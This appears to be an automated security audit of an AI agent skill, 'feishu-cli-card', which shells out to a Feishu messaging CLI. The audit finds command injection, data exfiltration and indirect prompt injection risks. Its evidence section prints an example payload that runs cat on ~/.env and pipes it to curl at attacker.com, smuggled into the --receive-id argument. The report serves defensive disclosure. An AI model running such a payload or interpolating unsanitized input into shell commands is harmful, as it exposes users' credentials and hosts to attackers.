feishu-cli-card

Fail

Audited by Gen Agent Trust Hub on May 18, 2026

Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill instructs the agent to execute shell commands via the Bash tool to send messages using feishu-cli.
  • Evidence: In SKILL.md (Workflow Step 6 and Sending Connection Step 8), the skill provides command templates like feishu-cli msg send --receive-id user@example.com --msg-type interactive --content-file /tmp/<name>-card.json.
  • Risk: The parameters --receive-id and the <name> component of the file path are derived from user input. There are no instructions to sanitize or escape these strings, allowing a malicious user to inject shell metacharacters (e.g., ;, `, $()) to execute arbitrary commands on the host system.
  • [DATA_EXFILTRATION]: The lack of input validation in the command execution workflow can be leveraged to exfiltrate sensitive system information.
  • Evidence: An attacker could craft a request that causes the shell to execute a command like feishu-cli msg send --receive-id "$(cat ~/.env | curl -F 'data=@-' https://attacker.com)" ....
  • [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection because it ingests untrusted user data and interpolates it into sensitive execution contexts.
  • Ingestion points: User intents provided via the <场景描述> argument in SKILL.md.
  • Boundary markers: Absent. The instructions do not specify any delimiters or safety warnings to prevent the agent from obeying instructions embedded in the user's data.
  • Capability inventory: The skill uses Bash (shell execution), Write (file system writes), and Read (file system reads).
  • Sanitization: Absent. There is no guidance provided to the agent on how to validate or escape external content before using it in shell commands or JSON structures.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
May 18, 2026, 01:48 PM
Security Audit — agent-trust-hub — feishu-cli-card